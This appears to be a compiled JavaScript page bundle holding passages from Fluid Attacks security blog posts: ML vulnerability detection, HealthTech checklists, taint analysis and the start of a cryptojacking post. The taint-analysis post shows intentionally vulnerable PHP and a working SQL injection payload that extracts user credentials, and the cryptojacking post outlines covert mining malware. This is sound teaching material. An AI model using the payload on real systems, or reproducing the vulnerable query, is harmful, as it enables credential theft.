possibility of integrating them into continuous software development via continuous integrations to detect vulnerabilities in \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/services/continuous-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"early stages\"})}),\" and avoid the spread of known security issues on latter versions of the system.\"]}),/*#__PURE__*/e(\"h2\",{children:\"References\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1807.04320.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Russell et al. (2018). Automated Vulnerability Detection in Source Code Using Deep Representation Learning\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://towardsdatascience.com/a-comprehensive-guide-to-convolutional-neural-networks-the-eli5-way-3bd2b1164a53\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Saha (2018). A Comprehensive Guide to Convolutional Neural Networks — the ELI5 way\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://towardsdatascience.com/recurrent-neural-networks-d4642c9bc7ce\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Venkatachalam (2019). Recurrent Neural Networks\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://towardsdatascience.com/understanding-random-forest-58381e0602d2\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Yiu (2019). Random Forest\"})}),\".\"]})})]})]});export const richText3=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Many startups are achieving success by redefining how the economy works. \",/*#__PURE__*/e(\"code\",{children:\"Xtechs\"}),\" (financial, health, insurance, among others) are reducing operational costs and delivering more value to customers, by leveraging on computer science and advances in electronics. \",/*#__PURE__*/e(\"code\",{children:\"3D\"}),\" printing, habit-tracking apps, cheap, precise and small measurement devices, and more, are just a few examples of what citizens and patients are using these days from so-called HealthTech. Additionally, within health centers new technology is supporting more efficient and effective practices. An explosion of new devices and interconnectedness is driving change to new levels. However, security threats have surrounded healthcare for years, and the emergence of HealthTech doesn’t mean fewer risks. Moreover, HealthTech might pose other significant challenges. A recent publication at Maturitas (Coventry & Branley, 2018) describes the cybersecurity challenges healthcare is currently facing. The potential economic exploitation of medical health records, the number of underprotected medical and non-medical devices, as well as the increasing complexity of the digitization of medical records calls for a more serious approach to cybersecurity in healthcare.\"]}),/*#__PURE__*/e(\"p\",{children:\"How to manage healthcare cybersecurity risks with this overload of interconnected devices and data? We believe organizations (specifically HealthTech companies) could learn from what has been innovative in healthcare management.\"})]});export const richText4=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"How doctors are improving performance in health centers\"}),/*#__PURE__*/e(\"img\",{alt:\"Atul Gawande\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/b5NJ9M0wAV0lBrjWf80DrBwU6M.png\",srcSet:\"https://framerusercontent.com/images/b5NJ9M0wAV0lBrjWf80DrBwU6M.png?scale-down-to=512 512w,https://framerusercontent.com/images/b5NJ9M0wAV0lBrjWf80DrBwU6M.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/b5NJ9M0wAV0lBrjWf80DrBwU6M.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"p\",{children:\"Atul Gawande.\"}),/*#__PURE__*/t(\"p\",{children:[\"Here’s a short story: Atul Gawande, renowned surgeon and writer worked with the World Health Organization to address high mortality rates within intensive care units (\",/*#__PURE__*/e(\"code\",{children:\"ICUs\"}),\"). The finding: checklists reduced \",/*#__PURE__*/e(\"code\",{children:\"40%\"}),\" in mortality in \",/*#__PURE__*/e(\"code\",{children:\"ICUs\"}),\", according to the evidence. However, that’s only the medium by which the breakthrough solution was delivered. What was behind? In general, Gawande says the amount of knowledge and complexity nowadays makes our work very hard to be accomplished flawlessly, even when we know how to do things. In the specific case of medical professionals, he points to overconfidence and memory limitations from surgeons: they are pretty sure they know what they are doing. But they also are prone to forgetting some crucial elements in surgery, like instruments or procedures. As simple as it appears, checklists are tools for better performance in many contexts. In his words:\"]}),/*#__PURE__*/e(\"blockquote\",{children:/*#__PURE__*/e(\"p\",{children:\"Checklists provide a kind of cognitive net. They catch mental flaws inherent in all of us – flaws of memory and attention and thoroughness. (Gawande, 2009)\"})}),/*#__PURE__*/t(\"p\",{children:[\"Dr. Gawande has gone further to improve performance, not only in \",/*#__PURE__*/e(\"code\",{children:\"ICUs\"}),\". He discussed the Morbidity and Mortality (M&M) conferences he runs in the Brigham and Women’s Hospital at \",/*#__PURE__*/e(a,{href:\"https://fs.blog/atul-gawande/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"The Knowledge Project podcast\"})}),\". These meetings are aligned to the work of Amy Edmondson in psychological safety (see for example Edmonson 1999; 2018). In brief, it is a safe space in which medical teams get together to discuss complications (cases that went wrong) within medical practice, including every death. The meeting is such that people attending are legally protected, that is to say, people cannot be attacked or removed from work by what they mention. In these meetings, medical teams discuss what could have been done differently to avoid the complications and how to ensure it doesn’t happen in the future. Making people feel safe to share about errors they made, for instance, in administering a higher dose of a drug to a patient with terrible consequences, has led to death rates falling quickly and faster recovery of patients. He also mentioned that, in general, the culture this practice has fostered is invaluable: people feel empowered and responsible, but also willing to take some risks when needed. For society, all these mean greater well-being.\"]}),/*#__PURE__*/e(\"h2\",{children:\"How HealthTech could learn from healthcare\"}),/*#__PURE__*/t(\"p\",{children:[\"We can see information and \",/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" assets as patients cybersecurity teams look after. Similar to healthcare, cybersecurity, computer science, and software engineering enjoy and suffer at the same time from large amounts of knowledge. Just like in healthcare, \",/*#__PURE__*/e(\"em\",{children:\"“necessary fallibility”\"}),\" is also present in cybersecurity. That is, despite scientific advances and the knowledge humankind has developed, some efforts people pursue are \",/*#__PURE__*/e(\"em\",{children:\"“simply beyond”\"}),\" human capacity (for example, complete security). We will never know everything for sure, and this is the case in cybersecurity. As HealthTech goes mainstream, the potential perils of such increased complexity, interconnectedness, and knowledge should be addressed.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Healthcare, nonetheless, is showing us that even in \",/*#__PURE__*/e(\"em\",{children:\"“necessary fallibility”\"}),\" environments, there could be ways to perform better. Particularly, checklists might be translated into cybersecurity operations. At Fluid Attacks, we believe there is a clear link in what we do and how organizations benefit by better managing \",/*#__PURE__*/e(\"em\",{children:\"“fallibility”\"}),\". HealthTech providers should be especially aware of how to ensure their developments provide reliable security for data and operations.\"]}),/*#__PURE__*/e(\"h2\",{children:\"How Fluid Attacks approach helps improving business performance\"}),/*#__PURE__*/t(\"p\",{children:[\"We have one single offering: we attack your software. We breach \",/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" systems flaws with superior effectiveness before others do, causing real harm.\"]}),/*#__PURE__*/t(\"p\",{children:[\"We do this, in part, similar to what Dr. Gawande and his team found to lower mortality rates in \",/*#__PURE__*/e(\"code\",{children:\"ICUs\"}),\": using checklists. However, we go some steps further:\"]}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"We are capable of \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/continuous-hacking\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"continuously hacking\"})}),\" enterprise-level systems. This is like a smart checklist. As this is continuous, our services can detect small changes that could pose risks to your business. We rely on our automated products, so nothing is left out (like with a checklist). Also, we go deeper: our security engineers are the best-trained hackers. They think and work all the time on how your system’s flaws can be combined to configure attack vectors others cannot identify.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"We automate almost everything we already know. Asserts is the product we have to assess how customers' systems are, quickly. It is like using a smart checklist, fed by all of our knowledge and experience.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"All that we do gets stored, described, and tracked in our platform. This platform makes it easier for our customers to keep track of their security weaknesses as well as their fixes performed.\"})})]}),/*#__PURE__*/t(\"p\",{children:[\"What about what Dr. Gawande calls M&M meetings? Well, the good news is that our approach makes you less likely to institute a version of the \",/*#__PURE__*/e(\"code\",{children:\"M&M\"}),\" meetings, as our work is proactive, not reactive. With us, you don’t have to wait to be hacked for real, and then discuss how to improve for the future. We help you to anticipate those complications, so you are better prepared, so you get more \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/seek-chaos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"antifragile\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Do you want to share your thoughts? \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/contact-us\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Do get in touch with us!\"})}),\" We can help.\"]})]});export const richText5=/*#__PURE__*/e(o.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[\"In several past articles, we have briefly touched on the concept of taint analysis. In this article, we will fill in the knowledge gaps regarding taint analysis which may have resulted from our previous references. On one hand, this concept is intimately linked with code representations used by some of the \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\"-powered vulnerability detectors we have presented before, and on the other hand, it is well-complemented by symbolic execution, so we deemed it necessary to clarify this concept a bit.\"]})});export const richText6=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Most of the \",/*#__PURE__*/e(\"code\",{children:\"OWASP\"}),\" top 10 web application vulnerabilities arise because an attacker can inject some code into the application’s inputs which are then used to perform some action in the server. The classic example for this is the \",/*#__PURE__*/e(\"code\",{children:\"SQL\"}),\" injection.\"]}),/*#__PURE__*/t(\"p\",{children:[\"For example, this page from \",/*#__PURE__*/e(\"code\",{children:\"bWAPP\"}),\" has an input where the user is supposed to write a movie name, which should contain only alphanumeric characters:\"]}),/*#__PURE__*/e(\"img\",{alt:\"bWAPP movie search\",className:\"framer-image\",height:\"539\",src:\"https://framerusercontent.com/images/gUeOQCdX2c9hnOuNR5vsfsbRnk.png\",srcSet:\"https://framerusercontent.com/images/gUeOQCdX2c9hnOuNR5vsfsbRnk.png?scale-down-to=512 512w,https://framerusercontent.com/images/gUeOQCdX2c9hnOuNR5vsfsbRnk.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/gUeOQCdX2c9hnOuNR5vsfsbRnk.png 1919w\",style:{aspectRatio:\"1919 / 1079\"},width:\"959\"}),/*#__PURE__*/e(\"h6\",{children:\"bWAPP movie search.\"}),/*#__PURE__*/e(\"p\",{children:\"Some movies will occasionally have punctuation marks such as a dash or a question mark. Here is what this page does with the user input:\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Adapted from \"}),/*#__PURE__*/e(a,{href:\"https://github.com/theand-fork/bwapp-code/blob/master/bWAPP/sqli_6.php\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"bWAPP code\"})})}),/*#__PURE__*/e(\"strong\",{children:\".\"})]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:'$title = $_POST[\"title\"];\\n$sql = \"SELECT * FROM movies WHERE title LIKE \\'%\" . $title . \"%\\'\";\\n$recordset = mysql_query($sql, $link);',language:\"PHP\"})})}),/*#__PURE__*/t(\"p\",{children:[\"The input is taken from the \",/*#__PURE__*/e(\"code\",{children:\"POST\"}),\" request and pasted right into a \",/*#__PURE__*/e(\"code\",{children:\"SQL\"}),\" query which is immediately performed and shown to the user in a table. If instead of an actual movie name, an attacker writes this in the box:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"%' UNION SELECT id, login, password, email, secret,\\nactivated, admin FROM users;#\",language:\"SQL\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Then the \",/*#__PURE__*/e(\"code\",{children:\"SQL\"}),\" query becomes this:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"SELECT * FROM movies WHERE title LIKE '%%'\\n  UNION SELECT id, login, password, email, secret,\\n  activated, admin FROM users;\",language:\"SQL\"})})}),/*#__PURE__*/e(\"p\",{children:\"And all the movies' information is retrieved, along with the users' login information:\"}),/*#__PURE__*/e(\"img\",{alt:\"tainted\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/GyOjrtsrniJ0Bf9gl3iaX0fjrRk.png\",srcSet:\"https://framerusercontent.com/images/GyOjrtsrniJ0Bf9gl3iaX0fjrRk.png?scale-down-to=512 512w,https://framerusercontent.com/images/GyOjrtsrniJ0Bf9gl3iaX0fjrRk.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/GyOjrtsrniJ0Bf9gl3iaX0fjrRk.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Tainted!\"}),/*#__PURE__*/t(\"p\",{children:[\"The user input has become \",/*#__PURE__*/e(\"em\",{children:\"tainted\"}),\", and hence the \",/*#__PURE__*/e(\"code\",{children:\"SQL\"}),\" query is now taintedas well. In the context of taint checking the \",/*#__PURE__*/e(\"code\",{children:\"$title\"}),\" input above is called a \",/*#__PURE__*/e(\"em\",{children:\"source\"}),\", which is where the bad input and the possible injection is coming from.\"]}),/*#__PURE__*/t(\"p\",{children:[\"What is the problem with tainted inputs? it depends on what is done with them, i.e., at the \",/*#__PURE__*/e(\"em\",{children:\"sink\"}),\", where the input is consumed. As we have stated in past articles illustrating other injection- or \",/*#__PURE__*/e(\"em\",{children:\"taint-style\"}),\", this can be avoided with input validation and sanitization. So basically, simply check that the input is valid and fix it if it’s not by removing dangerous characters or only allowing known good ones.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"em\",{children:\"Taint analysis\"}),\" or \",/*#__PURE__*/e(\"em\",{children:\"taint checking\"}),\" consists of identifying all sources of potentially dangerous user input, all security-critical sinks such as system calls, process interactions, invoking shells, altering files, etc, and figure out if there is any sanitizers between each source-sink pair:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Taint diagram\",className:\"framer-image\",height:\"377\",src:\"https://framerusercontent.com/images/MNh9qXYH52z79koTlEeBt5dnjd4.png\",srcSet:\"https://framerusercontent.com/images/MNh9qXYH52z79koTlEeBt5dnjd4.png?scale-down-to=512 512w,https://framerusercontent.com/images/MNh9qXYH52z79koTlEeBt5dnjd4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/MNh9qXYH52z79koTlEeBt5dnjd4.png 1920w\",style:{aspectRatio:\"1920 / 754\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Taint analysis diagram via \",/*#__PURE__*/e(a,{href:\"http://web.cs.iastate.edu/~weile/cs513x/5.TaintAnalysis1.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Coseinc\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Then, depending on whether this taint analysis is \",/*#__PURE__*/e(\"em\",{children:\"static\"}),\" (code) or _dynamic (runtime), the taint-checking tool should either report to the developer so they can fix the issues or avoid the execution of security-critical operations at the sink level based on data that has been tainted, respectively.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Dynamic taint analysis: the Perl approach\"}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"Perl\"}),\" programming language is well-known for having used taint analysis as early as 1989. It is one of its main built-in security features, as can be seen by browsing \",/*#__PURE__*/e(a,{href:\"https://perldoc.perl.org/perlsec.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"perlsec\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"Perl\"}),\" approach to taint checking is simple:\"]}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Treat every input as tainted.\"})})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:'my $name = $cgi->param(\"name\");  # Get the $name from user input, tainted!',language:\"Perl\"})})}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Any line of code that contains a tainted variable implies that any assigned variables in that line are also tainted.\"})})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:'my $full = $name.\"@fluidattacks.com\";  # Now $full is also tainted',language:\"Perl\"})})}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"A tainted variable can only be untainted by _laundering it via regular expressions:\"})})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"if ($full =~ /^([-\\\\@\\\\w.]+)$/) {\\n    $full = $1;                    # $full now untainted\\n}\",language:\"Perl\"})})}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"No tainted variable can be used in any risky command, such as invoking a sub-shell, opening files, interacting with system processes, etc. That’s the real run-time protection. Thus the following SQL \",/*#__PURE__*/e(\"code\",{children:\"query\"}),\" would fail:\"]})})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"$dbh->execute(\\\"SELECT * FROM users WHERE email = '$full';\\\");\",language:\"Perl\"})})}),/*#__PURE__*/t(\"p\",{children:[\"All a user needs to do to enable taint mode in \",/*#__PURE__*/e(\"code\",{children:\"Perl\"}),\" is add the \",/*#__PURE__*/e(\"code\",{children:\"-T\"}),\" switch when running from the command line or in the case of executable scripts, such as \",/*#__PURE__*/e(\"code\",{children:\"CGI\"}),\" scripts (a common use case for \",/*#__PURE__*/e(\"code\",{children:\"Perl\"}),\"), add that switch to the \",/*#__PURE__*/e(\"code\",{children:\"shebang\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"#!/usr/bin/perl -T\",language:\"Perl\"})})}),/*#__PURE__*/t(\"p\",{children:[\"It is worth noting that, since \",/*#__PURE__*/e(\"code\",{children:\"Perl\"}),\" is an interpreted scripting language, this taint mode is only a run-time protection which might not be bulletproof and also might block legitimate requests.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Static analysis: the PyT approach\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"PyT\"}),\" is a static taint-checking tool for detecting \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/what-is-vulnerability-management/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"security vulnerabilities\"})}),\" in \",/*#__PURE__*/e(\"code\",{children:\"Python\"}),\" web applications. More specifically, it was designed with \",/*#__PURE__*/e(\"code\",{children:\"Flask\"}),\" applications in mind. It was developed as a Master's thesis project by Stefan Micheelsen and Bruno Thalmann at Aalborg University.\"]}),/*#__PURE__*/t(\"p\",{children:[\"We chose this as an example of static taint checking not for its results, but rather for the very well-written and easy to understand thesis that explains PyT inner workings and hence, the theory behind static taint analysis. Regarding the actual results component, I got 0 vulnerabilities in our own projects when using this tool and, curiously in the tiny but bug-ridden \",/*#__PURE__*/e(a,{href:\"https://github.com/stamparm/DSVW\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Damn Small Vulnerable Web\"})}),\" application as well.\"]}),/*#__PURE__*/t(\"p\",{children:[\"As you might now expect, taint analysis is linked to the flow of information inside the program, which can be more accurately represented by the program’s \",/*#__PURE__*/e(\"em\",{children:\"Control Flow Graph\"}),\". They use as basis for a mathematical model known as a \",/*#__PURE__*/e(\"em\",{children:\"lattice\"}),\", which has an interesting property, all monotone (steadily increasing or decreasing) functions defined on them have a fixed point, they eventually stand still. As it happens, code reachability and data flow can be represented in terms of equations on this lattice. These are \",/*#__PURE__*/e(\"em\",{children:\"guaranteed\"}),\" to have a solution by the fixed point property above. Here is a more friendly depiction of the process, in the author’s own drawings:\"]}),/*#__PURE__*/e(\"img\",{alt:\"PyT process\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/d8IgZ8T1kJp11kybtiKyFXoJVE.png\",srcSet:\"https://framerusercontent.com/images/d8IgZ8T1kJp11kybtiKyFXoJVE.png?scale-down-to=512 512w,https://framerusercontent.com/images/d8IgZ8T1kJp11kybtiKyFXoJVE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/d8IgZ8T1kJp11kybtiKyFXoJVE.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Overview of PyT’s process from Micheelsen & Thalmann's PDF.\"}),/*#__PURE__*/e(\"p\",{children:\"The final step, of course, is reporting, so that the developer might take the appropriate measures to fix the taint vulnerabilities.\"}),/*#__PURE__*/e(\"p\",{children:\"The idea in both incarnations of taint analysis is simple but powerful. Figure out the attack surface and make sure the tainted input can never reach what you are trying to protect. Following this simple idea will surely lead to more secure code. But if you are not sure, you can always give a taint-checking tool a try.\"}),/*#__PURE__*/e(\"h2\",{children:\"Reference\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Stefan Micheelsen, Bruno Thalmann. \",/*#__PURE__*/e(\"em\",{children:\"PyT: A Static Analysis Tool for Detecting Security Vulnerabilities in Python Web Applications.\"}),\" \",/*#__PURE__*/e(a,{href:\"https://projekter.aau.dk/projekter/files/239563289/final.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"MSc thesis\"})}),\".\"]})})})]});export const richText7=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"p\",{children:\"Before we begin, we need a brief definition of blockchain. It is simply a unique, consensual, and distributed registry on the network that allows storage of information that cannot be modified, lost or deleted. It is used in the health sector, smart contracts, intellectual property management, and cryptocurrencies, the last being its most common use.\"}),/*#__PURE__*/t(\"p\",{children:[\"In the field of cryptocurrencies, a blockchain stores all transactions made with a cryptocurrency. The security and integrity of these systems are maintained by nodes, which are computers connected to the blockchain network competing with each other to verify transactions. This process is known as mining and is carried out by providing processing power with either \",/*#__PURE__*/e(\"code\",{children:\"CPUs\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"GPUs\"}),\", or by using specialized hardware for this type of task.\"]}),/*#__PURE__*/e(\"p\",{children:\"Usually nodes associate with each other and create groups that working together help to validate a group of transactions. When these transactions are validated, each node is rewarded with the proportion of the power contributed.\"})]});export const richText8=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Concept\"}),/*#__PURE__*/t(\"p\",{children:[\"When mining cryptocurrency, take into account that in these processes, the percentage of \",/*#__PURE__*/e(\"code\",{children:\"GPU\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"CPU\"}),\" usage increases, as well as the use of electricity.\"]}),/*#__PURE__*/e(\"p\",{children:\"Now, what if I tell you that others can perform such processing power for you, and even better, without having to divide the profits between them? It sounds pretty good, and it’s simple to implement with two variations:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"The first is carried out by infecting a victim’s machine with malware. Usually, this is done by social engineering. We can make a victim, without their knowledge, download malware that executes the mining process in the background.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"The other variation is in-browser mining. This executes code in the user’s browser when the user is accessing a particular site. In this case, \",/*#__PURE__*/e(\"code\",{children:\"JavaScript\"}),\" is used to execute such scripts.\"]})})]}),/*#__PURE__*/e(\"h2\",{children:\"Discussion\"}),/*#__PURE__*/t(\"p\",{children:[\"On one hand, some people prefer that their \",/*#__PURE__*/e(\"code\",{children:\"CPU\"}),\" be used \",/*#__PURE__*/e(\"code\",{children:\"100%\"}),\" of the time, without having to deal with ads and pop-ups on every new page.\"]}),/*#__PURE__*/e(\"p\",{children:\"On the other hand, antivirus companies periodically update their definition of malware and include web miners as a potential threat to a user’s system.\"}),/*#__PURE__*/t(\"p\",{children:[\"According to reports by COINTELEGRAPH\",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/cryptojacking-malware/#r1%20\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"[1]\"})}),\", Monero (the currency most affected by excessive mining) plans to reinforce its algorithm by requiring miners to dedicate over two gigabytes of \",/*#__PURE__*/e(\"code\",{children:\"RAM\"}),\" to the process, which could make cryptojacking attempts harder to hide.\"]}),/*#__PURE__*/t(\"p\",{children:[\"How the scripts are used defines whether the usage is legal or not. There are cases where attackers inject code into websites through \",/*#__PURE__*/e(\"code\",{children:\"XSS\"}),\", generating profits, but do not have the consent of the website administrator.\"]}),/*#__PURE__*/e(\"p\",{children:\"As noted above, with social engineering techniques, the attacker could make victims download malicious programs to perform mining without consent.\"}),/*#__PURE__*/e(\"h2\",{children:\"Tools\"}),/*#__PURE__*/t(\"p\",{children:[\"There are many tools that can be used to perform in-browser mining. \",/*#__PURE__*/e(a,{href:\"https://krebsonsecurity.com/2018/03/who-and-what-is-coinhive/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Coinhive\"})}),\" had been one of the most used, but since March 